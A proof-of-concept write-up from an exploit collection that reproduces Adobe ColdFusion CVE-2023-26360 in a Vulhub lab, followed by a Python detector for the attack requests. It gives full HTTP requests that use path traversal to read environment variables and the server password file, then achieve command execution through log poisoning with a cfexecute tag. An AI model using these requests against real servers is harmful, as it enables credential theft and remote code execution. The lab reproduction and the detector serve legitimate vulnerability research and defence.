Awesome-POC/中间件漏洞/Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360.md
2024-11-06 14:10:36 +08:00

# Adobe ColdFusion Local File Inclusion Vulnerability CVE-2023-26360
## Vulnerability description
Adobe ColdFusion is a dynamic web server product from the US company Adobe; CFML (ColdFusion Markup Language), the language it runs, is a programming language for web applications.
Adobe ColdFusion 2018 Update 15 and 2021 Update 5 and earlier contain a file inclusion vulnerability that an attacker can use to execute arbitrary code on the server.
Reference:
- [https://xz.aliyun.com/t/13392](https://xz.aliyun.com/t/13392)
## Environment setup
Start an Adobe ColdFusion 2018.0.15 server with Vulhub:
```
docker compose up -d
```
After a short wait the environment is up. Visit `http://your-vps-ip:8500/CFIDE/administrator/index.cfm` and enter the password `vulhub` to complete the Adobe ColdFusion installation.
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153449288.png)
## Reproduction
Send the following request to read the file `/proc/self/environ`:
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}
```
The Adobe ColdFusion root directory, `/opt/coldfusion/cfusion`, can be found in the response.
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153705716.png)
Reading `../../../../../../../../opt/coldfusion/cfusion/lib/password.properties` in the same way returns the server password:
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153740311.png)
To turn the file inclusion into arbitrary code execution, first send the following request to write a CFM script (the `_variables` value is not valid JSON, so the server records it in its log file):
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
_variables=<cfexecute name='id' outputFile='/tmp/awesome_poc' ></cfexecute>
```
Then include the log file to execute that CFM code:
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}
```
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153957320.png)
As can be seen, the output of the `id` command has been written to `/tmp/awesome_poc`.
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153931349.png)
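As an added defender-side example (not part of the original page or of Vulhub), the following Python checker classifies captured HTTP requests against the three patterns shown above: a call to `iedit.cfc` with `_cfclient=true`, a `_variables` JSON whose `_metadata.classname` traverses outside the web root, and a non-JSON `_variables` carrying a CFML tag (the log-poisoning step). The sample requests are constructed from the ones on this page; the endpoint path is assumed to be the default one.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint abused by the requests on this page; assumed to be served at its default path.
IEDIT_PATH = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"
CF_TAG = re.compile(r"<\s*cf[a-z]+", re.IGNORECASE)

def classify_request(method, target, body):
    """Findings for one captured request (method, request-target, body):
    cfclient_iedit      - iedit.cfc called with _cfclient=true (worth reviewing on its own)
    traversal_classname - _variables._metadata.classname uses '..' or an absolute path
    cfml_in_variables   - _variables is not JSON and carries a CFML tag (log-poisoning step)
    """
    findings = []
    parts = urlsplit(target)
    if parts.path != IEDIT_PATH:
        return findings
    if parse_qs(parts.query).get("_cfclient", [""])[0].lower() != "true":
        return findings
    findings.append("cfclient_iedit")
    if method.upper() != "POST":
        return findings
    variables = parse_qs(body, keep_blank_values=True).get("_variables", [""])[0]
    try:
        data = json.loads(variables)
    except ValueError:  # not JSON: the second request above relies on this value reaching the log
        data = None
    if isinstance(data, dict):
        meta = data.get("_metadata")
        classname = str(meta.get("classname", "")) if isinstance(meta, dict) else ""
        if ".." in classname or classname.startswith("/"):
            findings.append("traversal_classname")
    elif CF_TAG.search(variables):
        findings.append("cfml_in_variables")
    return findings

# Constructed samples: the three requests from this page plus one benign admin request.
TARGET = IEDIT_PATH + "?method=foo&_cfclient=true"
SAMPLE_REQUESTS = [
    ("POST", TARGET, '_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}'),
    ("POST", TARGET, "_variables=<cfexecute name='id' outputFile='/tmp/awesome_poc' ></cfexecute>"),
    ("POST", TARGET, '_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}'),
    ("GET", "/CFIDE/administrator/index.cfm", ""),
]

def scan(requests=SAMPLE_REQUESTS):
    """Map each request index to its findings; an empty list means nothing suspicious."""
    return {i: classify_request(m, t, b) for i, (m, t, b) in enumerate(requests)}
```

Run `scan()` over request bodies taken from a reverse proxy or WAF capture; plain access logs will not contain the POST body, so the checker needs body-level logging to be useful.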